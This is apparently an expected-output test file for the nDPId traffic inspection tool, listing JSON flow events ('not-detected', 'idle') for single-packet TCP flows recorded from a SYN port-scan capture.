+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32781,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32781,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49167,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49167,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32785,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 